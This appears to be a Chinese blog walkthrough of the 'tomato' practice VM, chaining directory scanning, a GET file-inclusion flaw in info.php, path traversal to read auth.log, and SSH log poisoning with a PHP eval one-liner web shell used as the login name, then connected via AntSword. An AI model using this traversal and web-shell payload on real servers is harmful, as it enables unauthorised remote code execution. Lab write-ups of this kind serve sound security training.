当前位置: 首页 > article >正文

tomato靶场通关攻略

1.打开tomato靶机和kali虚拟机

2.运用kali扫描靶机ip

3.浏览器访问靶机ip

4.kali   dirb扫描敏感文件

5.依次查看这几个文件,发现antibot_image下有文件info.php,发现一个被注释的get型文件包含漏洞,参数为image

6.查看日志文件

http://192.168.126.151/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log

7.将一句话木马作为ssh登录的用户名,然后登陆,密码随便输入,这样日志文件就会记录该用户登录失败的日志,而该用户的用户名就是我们的一句话木马。

http://192.168.126.151:2211/<?php @eval($_POST['cmd']);?>

运用蚁剑连接木马,连接成功即可


http://www.kler.cn/a/589201.html

相关文章:

  • Leetcode-131.Palindrome Partitioning [C++][Java]
  • ST的全新STM32U3微控制器(MCU)简析
  • 视频推拉流EasyDSS案例分析:互联网直播/点播技术与平台创新应用
  • 【PyTorch教学】pytorch 基本语法
  • 消息队列 Kafka、RocketMQ、RabbitMQ 对比与分析
  • 蓝桥杯备考:图论之Prim算法
  • 分类操作-06.根据id删除分类
  • python 打印阳历对应的日农历时间
  • .gitignore 文件用于 Git 应忽略的文件夹的格式
  • SNX币合规交易突破 XBIT去中心化交易所引领DEX安全新范式
  • Notepad++插件:快捷选择成对括号之间的内容
  • 【SpringMVC】常用注解:@RequestHeader
  • WEB UI自动化测试中,元素定位的八大定位方式详解
  • docker,centos容器开机启动程序
  • 手搓排列型枚举递归搜索树 全排列问题(dfs)
  • 南邮大一统计学想转码,考研还是就业?如何避免就业被卡?转专业难度大吗?是CC++或Java?
  • 深度学习多模态人脸情绪识别:从理论到实践
  • 提升fcp
  • “Ubuntu禁止root用户通过SSH直接登录”问题的解决
  • docker容器导出导入